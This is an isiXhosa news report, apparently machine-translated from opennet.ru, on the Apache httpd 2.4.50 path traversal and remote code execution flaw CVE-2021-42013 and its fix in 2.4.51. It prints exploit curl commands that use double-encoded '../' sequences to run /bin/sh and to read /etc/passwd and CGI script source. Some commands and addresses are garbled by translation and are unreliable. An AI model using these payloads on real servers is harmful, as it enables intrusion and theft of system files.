I-vector entsha yokuhlaselwa ifunyenwe kwiseva ye-Apache http, ehlala ingalungiswanga kuhlaziyo lwe-2.4.50 kwaye ivumela ukufikelela kwiifayile kwiindawo ezingaphandle kweengcambu zengcambu yesayithi. Ukongezelela, abaphandi baye bafumanisa indlela evumela ukuba, phambi kwemimiselo ethile engeyiyo eyomgangatho, kungekhona nje ukufunda iifayile zenkqubo, kodwa kunye nokwenza ukude ikhowudi yabo kumncedisi. Ingxaki ibonakala kuphela kukukhutshwa kwe-2.4.49 kunye ne-2.4.50; iinguqulelo zangaphambili azichaphazeleki. Ukuphelisa ubungozi obutsha, i-Apache httpd 2.4.51 yakhutshwa ngokukhawuleza.
Embindini wayo, ingxaki entsha (i-CVE-2021-42013) ifana ngokupheleleyo nokuba sesichengeni sokuqala (CVE-2021-41773) kwi-2.4.49, umahluko kuphela yi-encoding eyahlukileyo yeempawu "..". Ngokukodwa, ekukhululweni kwe-2.4.50 ukukwazi ukusebenzisa ulandelelwano "% 2e" ukubethelela inqaku kuvaliwe, kodwa ukukwazi ukufakwa kwekhowudi kabini kwaphoswa - xa kuchazwa ulandelelwano "%% 32% 65", umncedisi wayicacisa. kwi-"%2e" kwaye emva koko ungene kwi-".", okt. "../" amagama okuya kulawulo lwangaphambili banokufakwa ngekhowudi njenge ".%%32%65/".
Ngokuxhaphaza ubuthathaka ngokusebenzisa ikhowudi yophumezo, oku kunokwenzeka xa imod_cgi yenziwe kwaye indlela yesiseko isetyenziswa apho ufezekiso lwezikripthi zeCGI zivunyelwe (umzekelo, ukuba umyalelo weScriptAlias wenziwe ukuba usebenze okanye iflegi ye-ExecCGI ichaziwe Iinketho zomyalelo). Imfuneko enyanzelekileyo yohlaselo oluyimpumelelo kukubonelela ngokucacileyo ukufikelela kubalawuli abaneefayile eziphunyezwayo, ezinje nge/umgqomo, okanye ukufikelela kwingcambu yenkqubo yefayile “/” kwizicwangciso zeApache. Kuba ufikelelo olunjalo alunikwanga, uhlaselo lokwenziwa kwekhowudi lunesicelo esincinci kwiinkqubo zokwenyani.
Kwangaxeshanye, uhlaselo lokufumana imixholo yeefayile zesistim esitenxileyo kunye nemibhalo yomthombo wemibhalo yewebhu, efundeka ngumsebenzisi apho i-http yomncedisi esebenza phantsi kwayo, ihlala ifanelekile. Ukwenza uhlaselo olunjalo, kwanele ukuba ube nesikhombisi kwisiza esilungiselelwe kusetyenziswa izikhokelo ze "Alias" okanye "ScriptAlias" (iDocumentRoot ayanelanga), njenge "cgi-bin".
Umzekelo wokuxhaphaza okuvumela ukuba wenze into eluncedo "ye-id" kumncedisi: curl 'http://192.168.0.1/cgi-bin/.%%32%65/.%%32%65/.%% 32% 65/.%% 32% 65/.%% 32% 65/bin/sh' —idata 'echo Content-Type: text/plain; i-echo id' uid=1(daemon) gid=1(daemon) amaqela=1(daemon)
Umzekelo wezinto zokuxhaphaza ezikuvumela ukuba ubonise imixholo ye /etc/passwd kunye nesinye sezikripthi zewebhu (ukuvelisa ikhowudi yeskripthi, ulawulo oluchazwe ngomyalelo othi "Alias", apho ukuphunyezwa kweskripthi kungenziwanga, kufuneka kucaciswe. njengoluhlu lwesiseko): curl 'http://192.168.0.1 .32/cgi-bin/.%%65%32/.%%65%32/.%%65%32/.%%65%32/. %65%192.168.0.1/etc/passwd' curl 'http: //32/aliaseddir/.%%65%32/.%%65%32/.%%65%32/.%%65%32/. %%65%2/usr/local/apacheXNUMX/cgi -bin/test.cgi'
Ingxaki ikakhulu ichaphazela usasazo oluhlaziyiweyo oluqhubekayo njengeFedora, iArch Linux kunye neGentoo, kunye namazibuko eFreeBSD. Iipakethi kumasebe azinzileyo onikezelo lweseva egcinayo i-Debian, RHEL, Ubuntu kunye ne-SUSE ayichatshazelwa bubungozi. Ingxaki ayenzeki ukuba ufikelelo kubalawuli kwaliwe ngokucacileyo kusetyenziswa "funa zonke zaliwe" isicwangciso.
umthombo: opennet.ru